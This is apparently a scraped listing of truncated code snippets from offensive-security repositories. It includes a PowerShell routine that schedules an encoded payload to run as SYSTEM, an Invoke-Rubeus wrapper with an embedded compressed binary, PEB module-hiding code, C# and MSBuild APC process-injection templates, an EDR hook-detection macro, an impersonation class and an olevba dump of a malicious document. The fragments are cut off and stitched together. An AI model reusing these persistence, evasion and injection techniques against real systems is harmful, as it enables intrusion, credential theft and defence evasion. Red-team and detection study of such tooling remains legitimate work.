| $confirmpreference = "none" | |
| function Get-ScheduledTaskSystem | |
| { | |
| $Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) | |
| $SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount | |
| $action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc 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 |
| ## uploaded by @satya_enki | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| =============================================================================== | |
| FILE: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- |
| #!/usr/bin/python | |
| import requests | |
| import json | |
| import time | |
| import paramiko | |
| from Crypto.PublicKey import RSA | |
| from os import chmod | |
| public_key_name = "test1.key" |
| function Invoke-Rubeus { | |
| $EncodedCompressedFile = 'H4sIAAAAAAAEAOy9CZgcVbU4Xl1VXVsvM7drprpnyfRkmUnR3TNZJsAkLEmAsO8EmIQlYSchpLEaEBkmAipuIRBExQFFwiKLCipu6FNccMeHiruM6FPcnst7Ls8Fk/85595bS0/PJPr0/d/v+16+TNetc8+9dZdzzj3n3O2E9bcqmqIoOvzt2aMoH1L4v1XK3v9dD3/58hN55XH76bkfSh3/9Ny1l25q9F8R1C8Jzru8/4Lztm6tX9l//kX9wVVb+zdt7T/ipNP6L69feNFwLucsEHmcvEZRjk9pSvqG0XNlvs8r85RMarGiDEPJLA6bOh7C/RDYqPHSYVjl5VaU6Km8XSM4/tOUVa9SlHb6Hz3DB/3bDvmepPB870q3qqSmZPehLab96w+LTv8seD869j585UXXXInlHhL1Go7KHcti43DQCC6AMJUN627Ac7GWwFsF/4eDi7bUATErykx5HTAN77DmYj55PMfBsqlKWnnnoSnl+ZyqpOD9X1P0tb/pX586Dkn1yjxVm6AAAFQJUAVAkwAKnK82PKjXgNboUhSn7kLYh6YzKg+rfjdAVM2HYhhqowdefB2DWr0AD8L3VURVeharylL4PnyTafVOiHCqroFoTkb1AWqY9V54MeoMfod+POUYNcOoAyk431MrkK4d628q5UHFwXq40MZbRJ20oUwAOVzRmAPY1/Lc8KcK8DaElyN4HTrN0XZsGvaDYyAqBtx+InwFYujpzwWITIe9qtXnYVUrPYvTyqkp6j7WeEJVDKcxH+tgqH4O0Cb+DVrM8GLZ+guwVruNjwBuY0A0SHXbC4A3MFQc3PZjCOw2nsTYhRA7cD3G4CerwTNQQH8/AE78CGAeLwg2cHVI86pF/g5ZfxQTVzBrIMKqX8MPjmMS0RTQO1U3zdL+MMRkrfoiREWsXJjFv2AWixFuYhYWfv4b8PnykF1c11iKESPw4+om0+vLI |
| #include "stdafx.h" | |
| #include "HideModule.h" | |
| std::vector<UNLINKED_MODULE> UnlinkedModules; | |
| void RelinkModuleToPEB(HMODULE hModule) | |
| { | |
| std::vector<UNLINKED_MODULE>::iterator it = std::find_if(UnlinkedModules.begin(), UnlinkedModules.end(), FindModuleHandle(hModule)); | |
| if (it == UnlinkedModules.end()) |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
| #!/usr/bin/python | |
| #coding: utf-8 | |
| # F-Isolation v0.1 - F**k isolated environments | |
| # Written for the kind of pentest that starts inside an isolated Citrix session: the | |
| # clipboard is blocked, the machine has no internet access, and no local drive or share | |
| # can be mapped to upload tooling. | |
| # OCR + Keyboard emulation FTW! |
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| using System.Security; | |
| using System.Security.Permissions; | |
| using System.Security.Principal; | |
| namespace ImpersonationTesting | |
| { | |
| public class Impersonate : IDisposable |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!-- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |